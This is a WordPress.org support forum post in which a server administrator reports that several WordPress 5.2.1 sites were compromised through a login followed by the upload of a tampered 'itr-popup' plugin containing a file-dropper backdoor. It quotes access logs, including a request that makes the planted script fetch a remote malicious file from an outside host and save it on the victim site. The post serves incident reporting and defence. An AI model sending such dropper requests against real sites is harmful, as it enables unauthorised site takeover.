Quantcast
Channel: Topic Tag: malware | WordPress.org
Viewing all articles
Browse latest Browse all 1906

Different sites where hacked the same way on different servers

$
0
0

Hello there,

I’m managing some servers and I’ve figured out some WordPress sites (from different clients and different developers) are hacked a few days after their installations.

But, the hacking methods are completely similar to each other. This is what will happen:

1. A User logs into WordPress on his first try (seems that there is not any brute force attacks).
2. The logged in user uploads a plugin named itr-popup.

Here is the logs:

202.58.105.15 - - [23/May/2019:06:41:41 +0430] "GET /wp-login.php HTTP/1.0" 200 3944 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
202.58.105.15 - - [23/May/2019:06:41:31 +0430] "HEAD /wp-login.php HTTP/1.0" 200 570 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:45 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:47 +0430] "GET /wp-admin/ HTTP/1.0" 200 127945 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:56 +0430] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.0" 200 81558 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:09 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php HTTP/1.0" 200 5813 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:03 +0430] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.0" 200 51039 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

3. This plugin contains a file named itro-admin-scripts.php. This file accepts two parameters:

– url: Which is the url of a txt file that contains a malicious codes.
– dir: Where to save this malware on the victim site.

With this method, the hacker uploads any files he/she wants on the website and use them to hack other websites as well.

This is the logs of the way the hacker uploaded the scripts:

51.15.180.50 - - [23/May/2019:11:08:32 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php?url=http://nataliehaley.kage-tora.com/wp.txt&dir=wp-content/plugins/itr-popup/scripts/jscolor HTTP/1.0" 200 1047 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Both sites that this happened to them were using WordPress 5.2.1 and they made sure that they did not install this itr-popup plugin on their WordPress website.

Please note that they are different clients, different developers on different servers.

I even downloaded this plugin from WordPress repository and it was clean and itro-admin-scripts.php file which I said the hacker used it to upload malwares on the websites, is not included in the original version downloaded from WordPress.org. So, I believe that it’s not a problem with this plugin.

I didn’t find any similar attack reports on the internet. Anyone else having the same issue here? I worry if it’s some kind of a bug in WordPress 5.2.1 itself.

Thank you for your help.
Iman


Viewing all articles
Browse latest Browse all 1906

Trending Articles